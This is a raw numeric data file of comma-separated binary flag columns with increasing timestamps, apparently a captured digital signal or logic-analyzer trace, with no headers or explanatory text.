1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5089640e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5089880e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5090120e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5090640e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5090840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5090960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5091080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5091320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5091640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5091840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5092120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5092360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5092600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5092840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5093080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5093320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5093640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5093840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5094120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5094360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5094600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5094840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5095080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5095400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5095640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5095880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5096120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5096360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5096600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5096840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5097080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5097400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5097640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5097880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5098120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5098360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5098600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5098840e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5098920e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5099400e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5099640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5099720e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5099880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5100120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5100360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5100600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5100880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5101120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5101400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5101640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5101880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5102120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5102360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5102600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5102880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5103120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5103400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5103640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5103880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5104120e-03 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.5104160e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5104200e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5104640e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5104880e-03 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.5104920e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5104960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5105120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5105400e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5105640e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5105880e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5106120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5106360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5106600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5106840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5107080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5107320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5107600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5107840e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5107880e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5108360e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5108600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5108680e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5108840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5109080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5109320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5109600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5109840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5110120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5110360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5110600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5110840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5111080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5111320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5111600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5111840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5112120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5112360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5112600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5112840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5113080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5113320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5113600e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5113640e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5114120e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5114360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5114440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5114600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5114840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5115080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5115320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5115600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5115840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5116120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5116360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5116600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5116840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5117080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5117320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5117600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5117840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5118120e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5118360e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5118600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5118840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5119080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5119320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5119880e-03 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.5120120e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5120160e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.5120360e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.5120600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5120680e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5120840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5121080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5121320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5121600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5121840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5122120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5122360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5122600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5122840e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5123080e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5123400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5123640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5123880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5124120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5124360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5124600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5124880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5125120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5125400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5125640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5125880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5126120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5126360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5126600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5126880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5127120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5127400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5127640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5127880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5128120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5128360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5128600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5128880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5129120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5129400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5129640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5129880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5130120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5130360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5130600e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5130880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5131120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5131400e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5131640e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5131880e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5132120e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.5132360e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.5132600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.6379560e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.6381720e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6381880e-03 0,0,1,0,0,0,0,0,0,0,0,1,0,1,2.6382200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6382440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.6385400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6385640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.6385880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6386160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.6386440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6386680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.6387160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6387440e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,1,2.6387480e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,1,2.6387640e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,1,2.6387880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6387960e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,2.6388160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.6388440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6388520e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6388680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6388920e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6388960e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6389440e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6389680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6389760e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6389880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6390200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6390680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6390920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6391440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6391680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6392200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6392440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6392680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6392920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6393160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6393400e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6393480e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6393960e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6394200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6394280e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6394440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6394680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6394920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6395160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6395400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6395680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6395920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6396200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6396440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6396680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6396920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6397160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6397400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6397680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6397920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6398200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6398440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6398680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6399160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6399440e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6399480e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6399680e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6399880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6400000e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6400200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6400440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6400680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6400920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6401160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6401400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6401680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6401880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6402200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6402440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6402680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6402920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6403160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6403400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6403640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6403880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6404200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6404440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6404680e-03 0,0,1,0,0,0,0,0,0,1,0,0,0,0,2.6404920e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6404960e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6405440e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6405640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6405760e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6405880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6406160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6406440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6406680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6406920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6407160e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6407200e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6407640e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6407880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6407960e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6408160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6408440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6408680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6408920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6409440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6409640e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6409720e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6409880e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6410160e-03 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.6410200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6410240e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6410440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6410680e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6410720e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6411160e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6411440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6411480e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6411640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6411880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6412160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6412440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6412680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6412920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6413440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6413640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6414160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6414440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6414920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6415160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6415640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6415880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6416160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6416440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6416680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6416920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6417160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6417400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6417640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6417880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6418160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6418440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6418680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6418920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6419160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6419400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6419640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6419880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6420160e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6420440e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6420920e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6421160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6421240e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6421400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6421640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6422160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6422440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6422920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6423160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6423640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6423880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6424160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6424440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6424680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6424920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6425160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6425400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6425640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6425880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6426160e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6426440e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6426920e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6427160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6427240e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6427400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6427680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6427880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6428200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6428440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6428680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6428920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6429160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6429400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6429680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6429920e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6430200e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6430680e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6430920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6431000e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6431160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6431400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6431680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6431920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6432200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6432440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6432920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6433160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6433440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6433680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6434200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6434440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6434920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6435160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6435680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6435920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6436200e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6436440e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6436680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6436920e-03 0,0,1,0,0,0,0,0,0,1,0,0,0,0,2.6436960e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6437000e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6437440e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6437680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6437760e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6437960e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6438200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6438400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6438680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6438920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6439160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6439640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6439880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6440160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6440400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6440680e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6440920e-03 